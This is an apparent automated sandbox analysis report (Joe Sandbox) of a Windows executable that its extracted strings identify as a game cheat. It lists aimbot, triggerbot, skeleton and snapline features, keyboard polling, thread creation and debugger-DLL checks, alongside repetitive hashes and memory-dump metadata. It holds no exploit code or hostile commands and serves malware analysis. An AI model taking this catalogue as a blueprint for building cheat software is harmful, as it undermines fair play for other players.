                                                                                                                                                                                                      • API ID: Process$Current$BaseEnumModuleModulesName_stricmp
                                                                                                                                                                                                      • String ID: dbgcore.dll$dbghelp.dll
                                                                                                                                                                                                      • API String ID: 3352702578-4118436743
                                                                                                                                                                                                      • Opcode ID: 39409bc3aaebe3b29eb61088f4b17b1d3cca093d82c753ba441b24beb8647698
                                                                                                                                                                                                      • Instruction ID: 747fb9c13f57cc5a5b9924811237ce7af9719b1069c88fee3f25d314c3b8c117
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39409bc3aaebe3b29eb61088f4b17b1d3cca093d82c753ba441b24beb8647698
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB213232A18A82C5EB609B51F4562AA73A0FF8DB84F44013ADA9D8377DDF3CE549C700

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1133592946-0
                                                                                                                                                                                                      • Opcode ID: 29dd0aa1747a757d2d6cf578fca60c9522578ce549b093b6a4cd5ef780515681
                                                                                                                                                                                                      • Instruction ID: 0925ff970ed1ff149d1787f30f977a4c147287aa1d2c01a6a52d3de23991dab8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29dd0aa1747a757d2d6cf578fca60c9522578ce549b093b6a4cd5ef780515681
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E31FB11A08A4AC1EA14AB2594373B92391BF4DF84F44503CEA4DC72BFDE7CAA0DC751

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C8807
                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C8874
                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C889D
                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C88CF
                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C8913
                                                                                                                                                                                                      • ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C891A
                                                                                                                                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF68B4B2731), ref: 00007FF68B4C8927
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3395113616-0
                                                                                                                                                                                                      • Opcode ID: c9bcc7db87e2d8c628c8dffa5ca9983a5de8c2b7fd5a8934495827476f989654
                                                                                                                                                                                                      • Instruction ID: a772841dddac66ef0970ebcbe0c14da26f3bd6e92d632967d94751b29c145c11
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9bcc7db87e2d8c628c8dffa5ca9983a5de8c2b7fd5a8934495827476f989654
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92515336608A41C6EF208F59E4A1239A7A0FF88F95B15853ACE5E877B5CF3DD449C304

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 653 7ff68b4c8550-7ff68b4c8581 call 7ff68b4b2230 656 7ff68b4c8583 653->656 657 7ff68b4c85b5-7ff68b4c85c9 653->657 656->657 658 7ff68b4c8585-7ff68b4c859f 656->658 659 7ff68b4c85d0-7ff68b4c85e2 call 7ff68b4b2230 657->659 660 7ff68b4c85b2 658->660 661 7ff68b4c85a1-7ff68b4c85ab 658->661 665 7ff68b4c85e4-7ff68b4c85ee 659->665 666 7ff68b4c8656-7ff68b4c866a 659->666 660->657 661->660 663 7ff68b4c85ad-7ff68b4c85b0 661->663 663->657 665->666 667 7ff68b4c85f0-7ff68b4c85f9 665->667 668 7ff68b4c85fb-7ff68b4c8616 Sleep 667->668 669 7ff68b4c8618 667->669 668->659 670 7ff68b4c861a-7ff68b4c8626 Sleep 669->670 671 7ff68b4c8628-7ff68b4c8646 669->671 670->659 672 7ff68b4c864a-7ff68b4c8651 Sleep SleepEx 671->672 673 7ff68b4c8648 671->673 672->666 673->672
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1739919806-0
                                                                                                                                                                                                      • Opcode ID: a50091c0ed790ed5ba4a4af77befc5066d782cce0c07ef899954772bb3204052
                                                                                                                                                                                                      • Instruction ID: 7fd0504663316a2bc914ac58fafb1aca784bf3a6c36789b07378b0df4111ac2f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a50091c0ed790ed5ba4a4af77befc5066d782cce0c07ef899954772bb3204052
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F121B121B1924AC2EE188A05A12217A5351BF9CF80F44503DEE5E8B7EEED7CE949C740

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2168557111-0
                                                                                                                                                                                                      • Opcode ID: 637e5199e8fed006d71aa5e9ce5577a9ffca0d3cb35ddd55e9b0b21b32c4b3ec
                                                                                                                                                                                                      • Instruction ID: 0a78e289f121d5063c1b7ef4d351f3d679e056363451fb5e96e6e0d84fe9dd63
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 637e5199e8fed006d71aa5e9ce5577a9ffca0d3cb35ddd55e9b0b21b32c4b3ec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6E03932A08B81C2E6008B50F81545AB7A4FF98BC4F904039EBCD87A28CF7CD1A8CB40

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Random_device@std@@
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1041445435-0
                                                                                                                                                                                                      • Opcode ID: d08acc5a7e096a88d5e8e9658aff98f0d682f492a60f98396909c4c8d5c6f9d6
                                                                                                                                                                                                      • Instruction ID: 0f1096545973f2a170e810d44e4f09ca892a4d61b4aebc1a2e9ca6fd5a48b85a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d08acc5a7e096a88d5e8e9658aff98f0d682f492a60f98396909c4c8d5c6f9d6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C114632A28681C6EF689B64E0673BA6295FFCD740F405139E55EC3BE9EE7CD2058700

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 692 7ff68b481000-7ff68b481016 GetSystemMetrics
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4116985748-0
                                                                                                                                                                                                      • Opcode ID: daea00ada0414efe44a44fb4e988689d645bf63cfe94f6c23a42538f84b835a8
                                                                                                                                                                                                      • Instruction ID: 5ae051463ce21e88a607b7cf38c78ce5f592f73b82fda6a5d389be3a34a799b2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: daea00ada0414efe44a44fb4e988689d645bf63cfe94f6c23a42538f84b835a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CB09268E456A2C6D6182F226C5202521607F1C702F90093DC50A81365CE3C619A8F04
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetAsyncKeyState.USER32 ref: 00007FF68B4BB323
                                                                                                                                                                                                        • Part of subcall function 00007FF68B493190: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4931F3
                                                                                                                                                                                                        • Part of subcall function 00007FF68B493190: memcpy.VCRUNTIME140 ref: 00007FF68B493213
                                                                                                                                                                                                        • Part of subcall function 00007FF68B493190: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B493233
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BA3E0: CreateThread.KERNEL32 ref: 00007FF68B4BA4CA
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BA3E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BA505
                                                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BCE90
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BD11D
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: memset.VCRUNTIME140 ref: 00007FF68B4B39B0
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A00
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A12
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A24
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A36
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A48
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A5A
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A6C
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A7E
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A90
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AA2
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3AB4
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AC6
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AD8
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AEA
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AFC
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B0E
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B20
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B32
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B44
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B56
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B68
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B7A
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B8C
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4B3980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF68B4B3B9E
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BD1BD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ??5?$basic_istream@D@std@@@std@@U?$char_traits@V01@$_invalid_parameter_noinfo_noreturn$memcpy$AsyncCreateStateThreadexitfreemallocmemset
                                                                                                                                                                                                      • String ID: ##Main$##Main1$##Mains$%.0f$%.3f$(AIR STUCK)RISKY FEATURE:$@$Aimbot$Air Stuck$Box$Combat$Config$Corner$Distance$Draw Filled$Filled Fov$Fov Arrows$Fov Circle$Fov Size$Hitbox$Legit Config$Load Config$Misc$Options$Orqur Public$Prediction$Prediction $Prediction $Prediction $Rage Config$Rank$Render Count$Rifle Fov$Rifle Settings$Rifle Smooth$SMG Fov$SMG Settings$SMG Smooth$Save Config$Save/Load$Semi Config$Shotgun Fov$Shotgun Settings$Shotgun Smooth$Skeleton$Smoothing$Snapline$Sniper Fov$Sniper Settings$Sniper Smooth$Triggerbot$Triggerbot Delay (ms)$Triggerbot Distance (m)$Unload$Username$Visuals$Weapon$Weapon config$config.json
                                                                                                                                                                                                      • API String ID: 2312794053-2218353132
                                                                                                                                                                                                      • Opcode ID: 845d21d2e6ca2cfff7b227b5af749c745df84f846b3e29e2d9561c4854ad8532
                                                                                                                                                                                                      • Instruction ID: 7231d4c7b24b32035401c72b059fdd4191e8bee04755764530b312e0bbf257e0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 845d21d2e6ca2cfff7b227b5af749c745df84f846b3e29e2d9561c4854ad8532
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09237E32909A86C6E700DF25D4422ED7760FF9D744F09963ADA4D976BADF79E088CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE998
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4BE9B6
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE975
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8D04
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8D45
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8D86
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8DC5
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8E04
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8E43
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8E82
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8EC1
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8F00
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8F3F
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8F7E
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B8FC3
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9008
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B904D
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9092
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B90D7
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B911C
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9161
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B91A6
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B91EB
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9230
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9275
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B92BA
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B92FF
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9344
